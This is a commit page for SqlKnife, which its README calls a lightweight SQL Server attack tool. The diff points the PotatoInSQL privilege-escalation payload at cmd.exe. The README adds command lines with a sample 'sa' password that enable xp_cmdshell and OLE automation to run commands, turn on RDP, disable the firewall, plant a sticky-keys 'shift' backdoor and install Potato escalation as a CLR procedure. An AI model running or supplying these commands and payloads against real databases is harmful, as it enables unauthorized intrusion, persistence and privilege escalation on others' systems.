反斜线bug说明更新图片

0x727 · Aug 3, 2021 · 6c0444d · 6c0444d
2 parents 252ad16 + 022a67a
commit 6c0444d
Show file tree

Hide file tree

Showing 16 changed files with 79 additions and 25 deletions.
diff --git a/PotatoInSQL/PotatoInSQL.sqlproj b/PotatoInSQL/PotatoInSQL.sqlproj
@@ -16,7 +16,7 @@
     <ModelCollation>1033, CI</ModelCollation>
     <DefaultFileStructure>BySchemaAndSchemaType</DefaultFileStructure>
     <DeployToDatabase>True</DeployToDatabase>
-    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
+    <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
     <TargetLanguage>CS</TargetLanguage>
     <AppDesignerFolder>Properties</AppDesignerFolder>
     <SqlServerVerification>False</SqlServerVerification>

diff --git a/PotatoInSQL/Program.cs b/PotatoInSQL/Program.cs
@@ -53,8 +53,8 @@ public static void OriginMain(string cmd)
 
             string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
             ushort port = 6666;
-            //string program = @"c:\Windows\System32\cmd.exe";
-            string program = @"sqlps.exe";
+            string program = @"c:\Windows\System32\cmd.exe";
+            //string program = @"sqlps.exe";
             string programArgs = null;
             ExecutionMethod executionMethod = ExecutionMethod.Auto;
             bool showHelp = false;

diff --git a/README.md b/README.md
@@ -1,10 +1,11 @@
-# bSqlKnife
+# SqlKnife
 
 适合在命令行中使用的轻巧的SQL Server数据库攻击工具。
 
-
 ## 参数说明
 
+![](img/Snipaste_2021-08-03_10-43-27.png)
+
 ```
  <-H host> <-P port> <-u username> <-p password> <-D dbname> <--openrdp> <--shift> <--disfw> <--xpcmd> <--oacreate> <--dbup> <--fix> <--remove> <--3/--4>
 ```
@@ -21,7 +22,7 @@
 
 -c 要执行的命令
 
---openrdp 开启目标远程桌面
+--openrdp 开启目标远程桌面并读取当前远程桌面端口号
 
 --shift 创建shfit后门
 
@@ -45,14 +46,22 @@
 
 SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --fix
 
+![](img/Snipaste_2021-08-03_10-46-08.png)
+
+![Snipaste_2021-08-03_10-46-29](img/Snipaste_2021-08-03_10-46-29.png)
+
 #### 执行命令
 
 SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd -c whoami
 
+![Snipaste_2021-08-03_10-47-04](img/Snipaste_2021-08-03_10-47-04.png)
+
 #### 禁用xp_cmdshell
 
 SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --remove
 
+![Snipaste_2021-08-03_10-47-56](img/Snipaste_2021-08-03_10-47-56.png)
+
 
 ### 使用Ole Automation Procedures执行命令
 
@@ -62,27 +71,74 @@ SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --remove
 
 SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate --fix
 
+![Snipaste_2021-08-03_10-55-46](img/Snipaste_2021-08-03_10-55-46.png)
+
 #### 执行程序
 
-SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate -c calc.exe
+SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123  --oacreate -c calc.exe
+
+![Snipaste_2021-08-03_10-55-46](img/Snipaste_2021-08-03_10-55-46.png)
+
+![Snipaste_2021-08-03_10-56-34](img/Snipaste_2021-08-03_10-56-34.png)
 
 ### 开RDP，关防火墙加规则（开RDP时自动加），装shift后门
 
-基于注册表操作
+权限足够的前提下，基于注册表的操作
+
+#### 开启RDP
+
+SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --openrdp
+
+![Snipaste_2021-08-03_11-36-43](img/Snipaste_2021-08-03_11-36-43.png)
+
+![Snipaste_2021-08-03_11-36-57](img/Snipaste_2021-08-03_11-36-57.png)
+
+#### 关防火墙
 
+SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --disfw
 
+（可能不好用，可能是因为注册表位置参考windows10的原因）
 
+![Snipaste_2021-08-03_11-42-58](img/Snipaste_2021-08-03_11-42-58.png)
 
+#### 装shift后门
+
+SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --shift
+
+![Snipaste_2021-08-03_11-45-54](img/Snipaste_2021-08-03_11-45-54.png)
+
+![Snipaste_2021-08-03_11-29-11](img/Snipaste_2021-08-03_11-29-11.png)
 
 ### PotatoInSQL(--dbup)
 将土豆提权作为存储过程安装到数据库，然后调用。
 
+#### 安装.net3.5版本的potatoinsql
+
+SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --dbup --fix  --3
+
+![Snipaste_2021-08-03_11-17-47](img/Snipaste_2021-08-03_11-17-47.png)
+
+![Snipaste_2021-08-03_11-18-02](img/Snipaste_2021-08-03_11-18-02.png)
+
 
 
+#### 利用土豆执行命令
+
+SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --dbup -c whoami
+
+![Snipaste_2021-08-03_11-28-46](img/Snipaste_2021-08-03_11-28-46.png)
+
+![Snipaste_2021-08-03_11-29-11](img/Snipaste_2021-08-03_11-29-11.png)
+
 ### 启用/还原配置功能
+
+![Snipaste_2021-08-03_11-29-35](img/Snipaste_2021-08-03_11-29-35.png)
+
 做完操作之后把配置和CLR程序集清理掉。
 
 --fix参数和--remove参数只涉及--xpcmd、--oacreate、--clrcmd、--clrdexec、--dbup
 
 
-### 指定不同版本clr的payload
+### 指定不同版本clr的payload
+
+--3/--4 如果不加这个参数，默认是.net4版本的payload
diff --git a/SqlKnife/MsSqlExploit.cpp b/SqlKnife/MsSqlExploit.cpp
diff --git a/img/Snipaste_2021-08-03_11-17-47.png b/img/Snipaste_2021-08-03_11-17-47.png
diff --git a/img/Snipaste_2021-08-03_11-18-02.png b/img/Snipaste_2021-08-03_11-18-02.png
diff --git a/img/Snipaste_2021-08-03_11-19-41.png b/img/Snipaste_2021-08-03_11-19-41.png
diff --git a/img/Snipaste_2021-08-03_11-28-46.png b/img/Snipaste_2021-08-03_11-28-46.png
diff --git a/img/Snipaste_2021-08-03_11-29-11.png b/img/Snipaste_2021-08-03_11-29-11.png
diff --git a/img/Snipaste_2021-08-03_11-29-35.png b/img/Snipaste_2021-08-03_11-29-35.png
diff --git a/img/Snipaste_2021-08-03_11-36-43.png b/img/Snipaste_2021-08-03_11-36-43.png
diff --git a/img/Snipaste_2021-08-03_11-36-57.png b/img/Snipaste_2021-08-03_11-36-57.png
diff --git a/img/Snipaste_2021-08-03_11-42-58.png b/img/Snipaste_2021-08-03_11-42-58.png
diff --git a/img/Snipaste_2021-08-03_11-45-54.png b/img/Snipaste_2021-08-03_11-45-54.png
diff --git a/img/Snipaste_2021-08-03_11-46-53.png b/img/Snipaste_2021-08-03_11-46-53.png
diff --git a/sqltool.py b/sqltool.py